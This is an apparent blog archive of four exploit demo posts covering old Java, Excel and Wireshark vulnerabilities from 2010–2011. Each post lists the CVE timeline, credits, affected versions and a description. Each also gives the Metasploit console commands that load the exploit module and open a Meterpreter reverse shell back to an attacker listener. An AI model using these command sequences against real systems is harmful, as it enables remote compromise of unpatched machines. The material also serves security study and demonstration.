Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

CVE-2011-3544 Java Applet Rhino Script Engine Metasploit Demo

Timeline :

Vulnerability discovered and reported to ZDI by Michael Schierl
Vulnerability reported to vendor by ZDI the 2011-05-12
Coordinated release of the vulnerability the 2011-10-26
First exploit provided by Michael Schierl
Metasploit PoC provided the 2011-11-29

PoC provided by :

Michael Schierl
juan vazquez
Edward D. Teach
sinn3r

Reference(s) :

CVE-2011-3544
OSVDB-76500
ZDI-11-305
Oracle Java SE CPU October 2011

Affected version(s) :

JDK and JRE 7, 6 Update 27 and before

Tested on Windows XP Pro SP3 with :

Java JSE 6 Update 26

Description :

This module exploits a vulnerability in the Rhino Script Engine that can be used by a Java Applet to run arbitrary Java code outside of the sandbox. The vulnerability affects version 7 and version 6 update 27 and earlier, and should work on any browser that supports Java (for example: IE, Firefox, Google Chrome, etc)

Commands :

use exploit/multi/browser/java_rhino
set SRVHOST 192.168.178.21
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
sysinfo

MS10-038 Office Excel 2002 Overflow Exploit Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by Nicolas Joly
Coordinated release of the vulnerability the 2010-06-08
First exploit provided by abysssec the 2010-09-24
Metasploit PoC provided the 2011-11-21

PoC provided by :

Nicolas Joly
Shahin Ramezany
juan vazquez

Reference(s) :

CVE-2010-0822
OSVDB-65236
MS10-038
MOAUB #24
EBD-ID-15094

Affected version(s) :

Microsoft Office Excel 2002 Service Pack 3 and below
Microsoft Office Excel 2003 Service Pack 3 and below
Microsoft Office Excel 2007 Service Pack 1 and below
Microsoft Office Excel 2007 Service Pack 2
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Open XML File Format Converter for Mac
Microsoft Office Excel Viewer Service Pack 1 and below
Microsoft Office Excel Viewer Service Pack 2
Microsoft Office Compatibility Pack for Word, Excel
PowerPoint 2007 File Formats Service Pack 1
Microsoft Office Compatibility Pack for Word, Excel
PowerPoint 2007 File Formats Service Pack 2

Tested on Windows XP Pro SP3 with :

Microsoft Excel 2002 (10.2614.2625) SP0

Description :

This module exploits a vulnerability found in Excel 2002 of Microsoft Office XP. By supplying a .xls file with a malformed OBJ (recType 0x5D) record an attacker can get the control of the execution flow. This results arbitrary code execution under the context of the user.

Commands :

use exploit/windows/fileformat/ms10_038_excel_obj_bof
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

getuid
sysinfo

CVE-2011-3360 Wireshark console.lua pre-loading Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by Haifei Li of MMPC the 2011-07-18
Coordinated release of the vulnerability the 2011-11-15
Metasploit PoC provided the 2011-11-18

PoC provided by :

Haifei Li
sinn3r

Reference(s) :

CVE-2011-3360
OSVDB-75347
MSVR11-014

Affected version(s) :

Wireshark 1.6.1 and earlier

Tested on Windows XP Pro SP3 with :

Wireshark 1.6.1

Description :

This modules exploits a vulnerability in Wireshark 1.6 or less. When opening a pcap file, Wireshark will actually check if there’s a ‘console.lua’ file in the same directory, and then parse/execute the script if found. Versions affected by this vulnerability: 1.6.0 to 1.6.1, 1.4.0 to 1.4.8

Commands :

use exploit/windows/misc/wireshark_lua
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
sysinfo

MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow Metasploit Demo

Timeline :

Vulnerability discovered and reported to ZDI by Aniway
Vulnerability reported to vendor by ZDI the 2010-10-18
Coordinated release of the vulnerability the 2011-04-12
Metasploit PoC provided the 2011-11-05

PoC provided by :

Aniway
abysssec
sinn3r
juan vazquez

Reference(s) :

CVE-2011-0105
MS11-021
ZDI-11-121

Affected version(s) :

Microsoft Office XP Service Pack 3
Microsoft Office 2003 Service Pack 3
Microsoft Office 2007 Service Pack 2
Microsoft Office 2010 (32 and 64 bits edition)
Microsoft Office 2004 for Mac
Microsoft Office 2008 for Mac
Microsoft Office for Mac 2011
Open XML File Format Converter for Mac
Microsoft Excel Viewer Service Pack 2
Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats Service Pack 2

Tested on Windows XP Pro SP3 with :

Microsoft Office Excel 2007 (12.0.4518.014)

Description :

This module exploits a vulnerability found in Excel of Microsoft Office 2007. By supplying a malformed .xlb file, an attacker can control the content (source) of a memcpy routine, and the number of bytes to copy, therefore causing a stack- based buffer overflow. This results arbitrary code execution under the context of user the user.

Commands :

use exploit/windows/fileformat/ms11_021_xlb_bof
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21

getuid
sysinfo